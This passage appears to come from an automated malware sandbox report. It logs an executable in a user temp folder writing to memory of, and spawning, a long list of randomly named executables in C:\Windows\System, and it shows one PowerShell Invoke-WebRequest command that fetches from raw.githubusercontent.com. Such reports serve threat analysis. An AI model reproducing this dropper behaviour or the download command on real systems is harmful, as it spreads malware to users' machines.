PID 3004 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\aUlFtTb.exe
PID 3004 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\aUlFtTb.exe
PID 3004 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\aUlFtTb.exe
PID 3004 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\WfNyiIg.exe
PID 3004 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\WfNyiIg.exe
PID 3004 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\WfNyiIg.exe
PID 3004 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\uYVGRiR.exe
PID 3004 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\uYVGRiR.exe
PID 3004 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\uYVGRiR.exe
PID 3004 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\QcpeRow.exe
PID 3004 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\QcpeRow.exe
PID 3004 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\QcpeRow.exe
PID 3004 wrote to memory of 584 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\wVwzWGE.exe
PID 3004 wrote to memory of 584 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\wVwzWGE.exe
PID 3004 wrote to memory of 584 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\wVwzWGE.exe
PID 3004 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\osZTcHW.exe
PID 3004 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\osZTcHW.exe
PID 3004 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\osZTcHW.exe
PID 3004 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\QSflFyD.exe
PID 3004 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\QSflFyD.exe
PID 3004 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\QSflFyD.exe
PID 3004 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\hIcBbjX.exe
PID 3004 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\hIcBbjX.exe
PID 3004 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\hIcBbjX.exe
PID 3004 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\wpejEsJ.exe
PID 3004 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\wpejEsJ.exe
PID 3004 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\wpejEsJ.exe
PID 3004 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\FOEFUBv.exe
PID 3004 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\FOEFUBv.exe
PID 3004 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\FOEFUBv.exe
PID 3004 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\oJsrytP.exe
PID 3004 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\oJsrytP.exe
PID 3004 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\oJsrytP.exe
PID 3004 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\sxrCPjT.exe
PID 3004 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\sxrCPjT.exe
PID 3004 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\sxrCPjT.exe
PID 3004 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\kkRNIDH.exe
PID 3004 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\kkRNIDH.exe
PID 3004 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\kkRNIDH.exe
PID 3004 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\ioHcfky.exe
PID 3004 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\ioHcfky.exe
PID 3004 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\ioHcfky.exe
PID 3004 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\ywqOfnx.exe

Processes

C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\pXSoYZz.exe

C:\Windows\System\pXSoYZz.exe

C:\Windows\System\vZkSTFH.exe

C:\Windows\System\vZkSTFH.exe

C:\Windows\System\qBRtaYh.exe

C:\Windows\System\qBRtaYh.exe

C:\Windows\System\OaEkGuw.exe

C:\Windows\System\OaEkGuw.exe

C:\Windows\System\qerrWAq.exe

C:\Windows\System\qerrWAq.exe

C:\Windows\System\qYoPpGV.exe

C:\Windows\System\qYoPpGV.exe

C:\Windows\System\aUlFtTb.exe

C:\Windows\System\aUlFtTb.exe

C:\Windows\System\WfNyiIg.exe

C:\Windows\System\WfNyiIg.exe

C:\Windows\System\uYVGRiR.exe

C:\Windows\System\uYVGRiR.exe

C:\Windows\System\QcpeRow.exe

C:\Windows\System\QcpeRow.exe

C:\Windows\System\wVwzWGE.exe

C:\Windows\System\wVwzWGE.exe

C:\Windows\System\osZTcHW.exe

C:\Windows\System\osZTcHW.exe

C:\Windows\System\QSflFyD.exe

C:\Windows\System\QSflFyD.exe

C:\Windows\System\hIcBbjX.exe

C:\Windows\System\hIcBbjX.exe

C:\Windows\System\wpejEsJ.exe

C:\Windows\System\wpejEsJ.exe

C:\Windows\System\FOEFUBv.exe

C:\Windows\System\FOEFUBv.exe

C:\Windows\System\oJsrytP.exe

C:\Windows\System\oJsrytP.exe

C:\Windows\System\sxrCPjT.exe

C:\Windows\System\sxrCPjT.exe

C:\Windows\System\kkRNIDH.exe

C:\Windows\System\kkRNIDH.exe

C:\Windows\System\ioHcfky.exe

C:\Windows\System\ioHcfky.exe

C:\Windows\System\ywqOfnx.exe

C:\Windows\System\ywqOfnx.exe

C:\Windows\System\eVRYZnG.exe

C:\Windows\System\eVRYZnG.exe

C:\Windows\System\OALhLOE.exe

C:\Windows\System\OALhLOE.exe

C:\Windows\System\njshNOE.exe

C:\Windows\System\njshNOE.exe

C:\Windows\System\ZvvUIkk.exe

C:\Windows\System\ZvvUIkk.exe

C:\Windows\System\BuCvjyN.exe

C:\Windows\System\BuCvjyN.exe

C:\Windows\System\yhJwsGc.exe

C:\Windows\System\yhJwsGc.exe

C:\Windows\System\onknRvH.exe

C:\Windows\System\onknRvH.exe

C:\Windows\System\ayjxpqf.exe

C:\Windows\System\ayjxpqf.exe

C:\Windows\System\HThQyoT.exe

C:\Windows\System\HThQyoT.exe

C:\Windows\System\DYNxzJK.exe

C:\Windows\System\DYNxzJK.exe

C:\Windows\System\yfpynUr.exe

C:\Windows\System\yfpynUr.exe

C:\Windows\System\ZcOcYqB.exe

C:\Windows\System\ZcOcYqB.exe

C:\Windows\System\eWHziDz.exe

C:\Windows\System\eWHziDz.exe

C:\Windows\System\uLQqzMA.exe

C:\Windows\System\uLQqzMA.exe

C:\Windows\System\BuyXkLY.exe

C:\Windows\System\BuyXkLY.exe

C:\Windows\System\TkzhEyW.exe

C:\Windows\System\TkzhEyW.exe

C:\Windows\System\FHcqNtk.exe

C:\Windows\System\FHcqNtk.exe

C:\Windows\System\tyMgZVL.exe

C:\Windows\System\tyMgZVL.exe

C:\Windows\System\wZDMmNI.exe

C:\Windows\System\wZDMmNI.exe

C:\Windows\System\xKcwMjq.exe

C:\Windows\System\xKcwMjq.exe

C:\Windows\System\cNrTNlQ.exe

C:\Windows\System\cNrTNlQ.exe

C:\Windows\System\FDrzNCv.exe

C:\Windows\System\FDrzNCv.exe

C:\Windows\System\qtRDnhb.exe

C:\Windows\System\qtRDnhb.exe

C:\Windows\System\TPwRdWY.exe

C:\Windows\System\TPwRdWY.exe

C:\Windows\System\CQdqjpb.exe

C:\Windows\System\CQdqjpb.exe

C:\Windows\System\YvmTsDd.exe

C:\Windows\System\YvmTsDd.exe

C:\Windows\System\qhMoLjq.exe

C:\Windows\System\qhMoLjq.exe

C:\Windows\System\EBNmXNG.exe

C:\Windows\System\EBNmXNG.exe

C:\Windows\System\HlzymDa.exe

C:\Windows\System\HlzymDa.exe

C:\Windows\System\RyEbOmJ.exe

C:\Windows\System\RyEbOmJ.exe

C:\Windows\System\mwoSuOn.exe

C:\Windows\System\mwoSuOn.exe

C:\Windows\System\Npsbsad.exe

C:\Windows\System\Npsbsad.exe

C:\Windows\System\pcLROOO.exe

C:\Windows\System\pcLROOO.exe

C:\Windows\System\zKeomja.exe

C:\Windows\System\zKeomja.exe

C:\Windows\System\NvKDWaX.exe

C:\Windows\System\NvKDWaX.exe

C:\Windows\System\ZPkfLut.exe

C:\Windows\System\ZPkfLut.exe

C:\Windows\System\rUtPhvs.exe

C:\Windows\System\rUtPhvs.exe

C:\Windows\System\Ispnnpr.exe

C:\Windows\System\Ispnnpr.exe

C:\Windows\System\zfGbBaD.exe

C:\Windows\System\zfGbBaD.exe

C:\Windows\System\RBopSjv.exe

C:\Windows\System\RBopSjv.exe

C:\Windows\System\msHQlOJ.exe

C:\Windows\System\msHQlOJ.exe

C:\Windows\System\DFXvzPW.exe

C:\Windows\System\DFXvzPW.exe

C:\Windows\System\cAfsQcJ.exe

C:\Windows\System\cAfsQcJ.exe

C:\Windows\System\ehSeTeE.exe

C:\Windows\System\ehSeTeE.exe

C:\Windows\System\XmMUfCl.exe

C:\Windows\System\XmMUfCl.exe

C:\Windows\System\ksLnuxA.exe

C:\Windows\System\ksLnuxA.exe

C:\Windows\System\RNlYErZ.exe

C:\Windows\System\RNlYErZ.exe

C:\Windows\System\UYbncGa.exe

C:\Windows\System\UYbncGa.exe

C:\Windows\System\WCJSUEI.exe

C:\Windows\System\WCJSUEI.exe

C:\Windows\System\kTHBasS.exe

C:\Windows\System\kTHBasS.exe

C:\Windows\System\unVVPBk.exe

C:\Windows\System\unVVPBk.exe

C:\Windows\System\LiYVpnt.exe

C:\Windows\System\LiYVpnt.exe

C:\Windows\System\jgnaVsH.exe

C:\Windows\System\jgnaVsH.exe

C:\Windows\System\LndTMlM.exe

C:\Windows\System\LndTMlM.exe

C:\Windows\System\MiQkMMn.exe

C:\Windows\System\MiQkMMn.exe

C:\Windows\System\TuSqASg.exe

C:\Windows\System\TuSqASg.exe

C:\Windows\System\IBItdjs.exe

C:\Windows\System\IBItdjs.exe

C:\Windows\System\EKIjHLJ.exe

C:\Windows\System\EKIjHLJ.exe

C:\Windows\System\lIaYuzz.exe

C:\Windows\System\lIaYuzz.exe

C:\Windows\System\rUphkCz.exe

C:\Windows\System\rUphkCz.exe

C:\Windows\System\fdKFOec.exe

C:\Windows\System\fdKFOec.exe

C:\Windows\System\XUTjlPq.exe

C:\Windows\System\XUTjlPq.exe

C:\Windows\System\FxgJGzr.exe

C:\Windows\System\FxgJGzr.exe

C:\Windows\System\OZzisqL.exe

C:\Windows\System\OZzisqL.exe

C:\Windows\System\IZAjjBk.exe

C:\Windows\System\IZAjjBk.exe

C:\Windows\System\HxHBovv.exe

C:\Windows\System\HxHBovv.exe

C:\Windows\System\heyuaqj.exe

C:\Windows\System\heyuaqj.exe

C:\Windows\System\JzJncxz.exe

C:\Windows\System\JzJncxz.exe

C:\Windows\System\hucmIAn.exe

C:\Windows\System\hucmIAn.exe

C:\Windows\System\tDmrGDM.exe

C:\Windows\System\tDmrGDM.exe

C:\Windows\System\UXpLMjy.exe

C:\Windows\System\UXpLMjy.exe

C:\Windows\System\sZgwPHP.exe

C:\Windows\System\sZgwPHP.exe

C:\Windows\System\lTkMlRj.exe

C:\Windows\System\lTkMlRj.exe

C:\Windows\System\ReunZjo.exe

C:\Windows\System\ReunZjo.exe

C:\Windows\System\jqUdrzM.exe

C:\Windows\System\jqUdrzM.exe

C:\Windows\System\wmveEZl.exe

C:\Windows\System\wmveEZl.exe

C:\Windows\System\yfSSayF.exe

C:\Windows\System\yfSSayF.exe

C:\Windows\System\QOQBcKF.exe

C:\Windows\System\QOQBcKF.exe

C:\Windows\System\XgYziJP.exe

C:\Windows\System\XgYziJP.exe

C:\Windows\System\PRwsBPo.exe

C:\Windows\System\PRwsBPo.exe

C:\Windows\System\hJjBogC.exe

C:\Windows\System\hJjBogC.exe

C:\Windows\System\bTlDgty.exe

C:\Windows\System\bTlDgty.exe

C:\Windows\System\LOCsBcQ.exe

C:\Windows\System\LOCsBcQ.exe

C:\Windows\System\zaupNCG.exe

C:\Windows\System\zaupNCG.exe

C:\Windows\System\CXuPEwA.exe

C:\Windows\System\CXuPEwA.exe

C:\Windows\System\mLMyWng.exe

C:\Windows\System\mLMyWng.exe

C:\Windows\System\zJmShIv.exe

C:\Windows\System\zJmShIv.exe

C:\Windows\System\pcFzhOp.exe

C:\Windows\System\pcFzhOp.exe

C:\Windows\System\GgUHDYD.exe

C:\Windows\System\GgUHDYD.exe

C:\Windows\System\DEiDLiH.exe

C:\Windows\System\DEiDLiH.exe

C:\Windows\System\fhWlYhT.exe

C:\Windows\System\fhWlYhT.exe

C:\Windows\System\OMwLNDs.exe

C:\Windows\System\OMwLNDs.exe

C:\Windows\System\mxsPKTe.exe

C:\Windows\System\mxsPKTe.exe

C:\Windows\System\YqJNMfL.exe

C:\Windows\System\YqJNMfL.exe

C:\Windows\System\ARHjBtm.exe

C:\Windows\System\ARHjBtm.exe

C:\Windows\System\DcdvbYY.exe

C:\Windows\System\DcdvbYY.exe

C:\Windows\System\TvfgYEp.exe

C:\Windows\System\TvfgYEp.exe

C:\Windows\System\BJJmNrN.exe

C:\Windows\System\BJJmNrN.exe

C:\Windows\System\bkfYAfF.exe

C:\Windows\System\bkfYAfF.exe

C:\Windows\System\iBxIxCM.exe

C:\Windows\System\iBxIxCM.exe

C:\Windows\System\YWXhcJT.exe

C:\Windows\System\YWXhcJT.exe

C:\Windows\System\RRqZUSD.exe

C:\Windows\System\RRqZUSD.exe

C:\Windows\System\XUSSLhH.exe

C:\Windows\System\XUSSLhH.exe

C:\Windows\System\zFvxBqq.exe

C:\Windows\System\zFvxBqq.exe

C:\Windows\System\ZJphtBB.exe

C:\Windows\System\ZJphtBB.exe

C:\Windows\System\cCpShlG.exe

C:\Windows\System\cCpShlG.exe

C:\Windows\System\LWCejaA.exe

C:\Windows\System\LWCejaA.exe

C:\Windows\System\sPwoHpG.exe

C:\Windows\System\sPwoHpG.exe

C:\Windows\System\GLJUcLy.exe

C:\Windows\System\GLJUcLy.exe

C:\Windows\System\twqjEIc.exe

C:\Windows\System\twqjEIc.exe

C:\Windows\System\CzlsmCC.exe

C:\Windows\System\CzlsmCC.exe

C:\Windows\System\SvYxMUK.exe

C:\Windows\System\SvYxMUK.exe

C:\Windows\System\YUJGbHQ.exe

C:\Windows\System\YUJGbHQ.exe

C:\Windows\System\DpHCLqT.exe

C:\Windows\System\DpHCLqT.exe

C:\Windows\System\NdatzCv.exe

C:\Windows\System\NdatzCv.exe

C:\Windows\System\RIGtphx.exe

C:\Windows\System\RIGtphx.exe

C:\Windows\System\LFiBaPE.exe

C:\Windows\System\LFiBaPE.exe

C:\Windows\System\Hpzlweq.exe

C:\Windows\System\Hpzlweq.exe

C:\Windows\System\CztAvJU.exe

C:\Windows\System\CztAvJU.exe

C:\Windows\System\VctNkkX.exe

C:\Windows\System\VctNkkX.exe

C:\Windows\System\RiGpXFt.exe

C:\Windows\System\RiGpXFt.exe

C:\Windows\System\FPOieeh.exe

C:\Windows\System\FPOieeh.exe

C:\Windows\System\kKEEFQO.exe

C:\Windows\System\kKEEFQO.exe

C:\Windows\System\oeNWGAI.exe

C:\Windows\System\oeNWGAI.exe

C:\Windows\System\FmJfOQM.exe

C:\Windows\System\FmJfOQM.exe

C:\Windows\System\ZdSLIuH.exe

C:\Windows\System\ZdSLIuH.exe

C:\Windows\System\OiEConR.exe

C:\Windows\System\OiEConR.exe

C:\Windows\System\myxVqQQ.exe

C:\Windows\System\myxVqQQ.exe

C:\Windows\System\hfmJtLK.exe

C:\Windows\System\hfmJtLK.exe

C:\Windows\System\iJlixVS.exe

C:\Windows\System\iJlixVS.exe

C:\Windows\System\QzxIxYR.exe

C:\Windows\System\QzxIxYR.exe

C:\Windows\System\LmxXLoq.exe

C:\Windows\System\LmxXLoq.exe

C:\Windows\System\ocGTmmQ.exe

C:\Windows\System\ocGTmmQ.exe

C:\Windows\System\gWrciDq.exe

C:\Windows\System\gWrciDq.exe

C:\Windows\System\xiIIkBm.exe

C:\Windows\System\xiIIkBm.exe

C:\Windows\System\hWNdvXp.exe

C:\Windows\System\hWNdvXp.exe

C:\Windows\System\uuZUaOX.exe

C:\Windows\System\uuZUaOX.exe

C:\Windows\System\BTxWfeC.exe

C:\Windows\System\BTxWfeC.exe

C:\Windows\System\MHkGRhs.exe

C:\Windows\System\MHkGRhs.exe

C:\Windows\System\ZPqBHQx.exe

C:\Windows\System\ZPqBHQx.exe

C:\Windows\System\FtNXsQV.exe

C:\Windows\System\FtNXsQV.exe

C:\Windows\System\pjtyvzx.exe

C:\Windows\System\pjtyvzx.exe

C:\Windows\System\OmuLflb.exe

C:\Windows\System\OmuLflb.exe

C:\Windows\System\eDlmIgM.exe

C:\Windows\System\eDlmIgM.exe

C:\Windows\System\BrwJjcw.exe

C:\Windows\System\BrwJjcw.exe

C:\Windows\System\AeURmdH.exe

C:\Windows\System\AeURmdH.exe

C:\Windows\System\vYlxlDm.exe

C:\Windows\System\vYlxlDm.exe

C:\Windows\System\WaffHLm.exe

C:\Windows\System\WaffHLm.exe

C:\Windows\System\vStUATm.exe

C:\Windows\System\vStUATm.exe

C:\Windows\System\AdTQMUY.exe

C:\Windows\System\AdTQMUY.exe

C:\Windows\System\usnUyoU.exe

C:\Windows\System\usnUyoU.exe

C:\Windows\System\YeabWaA.exe

C:\Windows\System\YeabWaA.exe

C:\Windows\System\XuqtvEA.exe

C:\Windows\System\XuqtvEA.exe

C:\Windows\System\TQhCOyF.exe

C:\Windows\System\TQhCOyF.exe

C:\Windows\System\wWINmWL.exe

C:\Windows\System\wWINmWL.exe

C:\Windows\System\qWthvte.exe

C:\Windows\System\qWthvte.exe

C:\Windows\System\EORBXPx.exe

C:\Windows\System\EORBXPx.exe

C:\Windows\System\SciikEA.exe

C:\Windows\System\SciikEA.exe

C:\Windows\System\spHoUpK.exe

C:\Windows\System\spHoUpK.exe

C:\Windows\System\QEXFQGW.exe

C:\Windows\System\QEXFQGW.exe

C:\Windows\System\alyHxPW.exe

C:\Windows\System\alyHxPW.exe

C:\Windows\System\tWnxDEJ.exe

C:\Windows\System\tWnxDEJ.exe

C:\Windows\System\txVkIfe.exe

C:\Windows\System\txVkIfe.exe

C:\Windows\System\tqNaibc.exe

C:\Windows\System\tqNaibc.exe

C:\Windows\System\eidJxuJ.exe

C:\Windows\System\eidJxuJ.exe

C:\Windows\System\KWDtbSj.exe

C:\Windows\System\KWDtbSj.exe

C:\Windows\System\JFhpYBA.exe

C:\Windows\System\JFhpYBA.exe

C:\Windows\System\gKyHCPY.exe

C:\Windows\System\gKyHCPY.exe

C:\Windows\System\OtpnJBd.exe

C:\Windows\System\OtpnJBd.exe

C:\Windows\System\rPZhbBv.exe

C:\Windows\System\rPZhbBv.exe

C:\Windows\System\atqqool.exe

C:\Windows\System\atqqool.exe

C:\Windows\System\wDBvNZl.exe

C:\Windows\System\wDBvNZl.exe

C:\Windows\System\dqnGTuO.exe

C:\Windows\System\dqnGTuO.exe

C:\Windows\System\HllyjGQ.exe

C:\Windows\System\HllyjGQ.exe

C:\Windows\System\ckbEzSw.exe

C:\Windows\System\ckbEzSw.exe

C:\Windows\System\sAxtJgT.exe

C:\Windows\System\sAxtJgT.exe

C:\Windows\System\UdwCNTZ.exe

C:\Windows\System\UdwCNTZ.exe

C:\Windows\System\wilaHOH.exe

C:\Windows\System\wilaHOH.exe

C:\Windows\System\EPvEwSw.exe

C:\Windows\System\EPvEwSw.exe

C:\Windows\System\poqxogm.exe

C:\Windows\System\poqxogm.exe

C:\Windows\System\abKuBws.exe

C:\Windows\System\abKuBws.exe

C:\Windows\System\lZiWRSn.exe

C:\Windows\System\lZiWRSn.exe

C:\Windows\System\KcYteAt.exe

C:\Windows\System\KcYteAt.exe

C:\Windows\System\DKBKnRG.exe

C:\Windows\System\DKBKnRG.exe

C:\Windows\System\UiPJpbO.exe

C:\Windows\System\UiPJpbO.exe

C:\Windows\System\YOOSZvl.exe

C:\Windows\System\YOOSZvl.exe

C:\Windows\System\DWvbmEn.exe

C:\Windows\System\DWvbmEn.exe

C:\Windows\System\LUDUgvR.exe

C:\Windows\System\LUDUgvR.exe

C:\Windows\System\ToNbkJS.exe

C:\Windows\System\ToNbkJS.exe

C:\Windows\System\DTRxVUz.exe

C:\Windows\System\DTRxVUz.exe

C:\Windows\System\lWGLPMf.exe

C:\Windows\System\lWGLPMf.exe

C:\Windows\System\ZJgSCZT.exe

C:\Windows\System\ZJgSCZT.exe

C:\Windows\System\HJSwaPR.exe

C:\Windows\System\HJSwaPR.exe

C:\Windows\System\GAmHBpe.exe

C:\Windows\System\GAmHBpe.exe

C:\Windows\System\RdZMJut.exe

C:\Windows\System\RdZMJut.exe

C:\Windows\System\ahgDunq.exe

C:\Windows\System\ahgDunq.exe

C:\Windows\System\MeJChuT.exe

C:\Windows\System\MeJChuT.exe

C:\Windows\System\PKVXASe.exe

C:\Windows\System\PKVXASe.exe

C:\Windows\System\kxXpvMn.exe

C:\Windows\System\kxXpvMn.exe

C:\Windows\System\CnDwliS.exe

C:\Windows\System\CnDwliS.exe

C:\Windows\System\QIdcAFI.exe

C:\Windows\System\QIdcAFI.exe

C:\Windows\System\enbVgeB.exe

C:\Windows\System\enbVgeB.exe

C:\Windows\System\pVsWRaj.exe

C:\Windows\System\pVsWRaj.exe

C:\Windows\System\IHAziAH.exe

C:\Windows\System\IHAziAH.exe

C:\Windows\System\fMhKEpk.exe

C:\Windows\System\fMhKEpk.exe

C:\Windows\System\OgXGvOg.exe

C:\Windows\System\OgXGvOg.exe

C:\Windows\System\Dqdjoxn.exe

C:\Windows\System\Dqdjoxn.exe

C:\Windows\System\aWOtogj.exe

C:\Windows\System\aWOtogj.exe

C:\Windows\System\UTYBtlD.exe

C:\Windows\System\UTYBtlD.exe

C:\Windows\System\OpyMhXg.exe

C:\Windows\System\OpyMhXg.exe

C:\Windows\System\JfZJPMD.exe

C:\Windows\System\JfZJPMD.exe

C:\Windows\System\PAORAVL.exe

C:\Windows\System\PAORAVL.exe

C:\Windows\System\gDdcCIH.exe

C:\Windows\System\gDdcCIH.exe

C:\Windows\System\gHKfQsC.exe

C:\Windows\System\gHKfQsC.exe

C:\Windows\System\iHFHXdS.exe

C:\Windows\System\iHFHXdS.exe

C:\Windows\System\xcAeKtp.exe

C:\Windows\System\xcAeKtp.exe

C:\Windows\System\HMmveSm.exe

C:\Windows\System\HMmveSm.exe

C:\Windows\System\xXiSUHw.exe

C:\Windows\System\xXiSUHw.exe

C:\Windows\System\AQofCBl.exe

C:\Windows\System\AQofCBl.exe

C:\Windows\System\jHIeFlS.exe

C:\Windows\System\jHIeFlS.exe

C:\Windows\System\KpTiOqP.exe

C:\Windows\System\KpTiOqP.exe

C:\Windows\System\kDYhycX.exe

C:\Windows\System\kDYhycX.exe

C:\Windows\System\JEzlWzX.exe

C:\Windows\System\JEzlWzX.exe

C:\Windows\System\lhaNnCP.exe

C:\Windows\System\lhaNnCP.exe

C:\Windows\System\fmAVDrD.exe

C:\Windows\System\fmAVDrD.exe

C:\Windows\System\qngkhSt.exe

C:\Windows\System\qngkhSt.exe

C:\Windows\System\LXrxlmJ.exe

C:\Windows\System\LXrxlmJ.exe

C:\Windows\System\NiHgndo.exe

C:\Windows\System\NiHgndo.exe

C:\Windows\System\mLkvTGu.exe

C:\Windows\System\mLkvTGu.exe

C:\Windows\System\DRFbAxV.exe

C:\Windows\System\DRFbAxV.exe

C:\Windows\System\RFuEIDB.exe

C:\Windows\System\RFuEIDB.exe

C:\Windows\System\dcGLlck.exe

C:\Windows\System\dcGLlck.exe

C:\Windows\System\RpEZAPm.exe

C:\Windows\System\RpEZAPm.exe

C:\Windows\System\XHNAERQ.exe

C:\Windows\System\XHNAERQ.exe

C:\Windows\System\gSiJWkl.exe

C:\Windows\System\gSiJWkl.exe

C:\Windows\System\JTcOUSV.exe

C:\Windows\System\JTcOUSV.exe

C:\Windows\System\UVBTrQg.exe

C:\Windows\System\UVBTrQg.exe

C:\Windows\System\bDNiEMq.exe

C:\Windows\System\bDNiEMq.exe

C:\Windows\System\EMoAkWX.exe

C:\Windows\System\EMoAkWX.exe

C:\Windows\System\pBzQAfY.exe

C:\Windows\System\pBzQAfY.exe

C:\Windows\System\tlBpDQu.exe

C:\Windows\System\tlBpDQu.exe

C:\Windows\System\zHGnHKx.exe

C:\Windows\System\zHGnHKx.exe

C:\Windows\System\vvmNHBI.exe

C:\Windows\System\vvmNHBI.exe

C:\Windows\System\LMZlmIH.exe

C:\Windows\System\LMZlmIH.exe

C:\Windows\System\NauQWda.exe

C:\Windows\System\NauQWda.exe

C:\Windows\System\sehQUez.exe

C:\Windows\System\sehQUez.exe

C:\Windows\System\PEWGZkr.exe

C:\Windows\System\PEWGZkr.exe

C:\Windows\System\FNJSnKv.exe

C:\Windows\System\FNJSnKv.exe

C:\Windows\System\EOHhufw.exe

C:\Windows\System\EOHhufw.exe

C:\Windows\System\RFpjnor.exe

C:\Windows\System\RFpjnor.exe

C:\Windows\System\xCSspAC.exe

C:\Windows\System\xCSspAC.exe

C:\Windows\System\jMsVpnS.exe

C:\Windows\System\jMsVpnS.exe

C:\Windows\System\AjtpcBT.exe

C:\Windows\System\AjtpcBT.exe

C:\Windows\System\BbxFPWC.exe

C:\Windows\System\BbxFPWC.exe

C:\Windows\System\tFLMMqa.exe

C:\Windows\System\tFLMMqa.exe

C:\Windows\System\gxDxbZF.exe

C:\Windows\System\gxDxbZF.exe

C:\Windows\System\qCBbnXc.exe

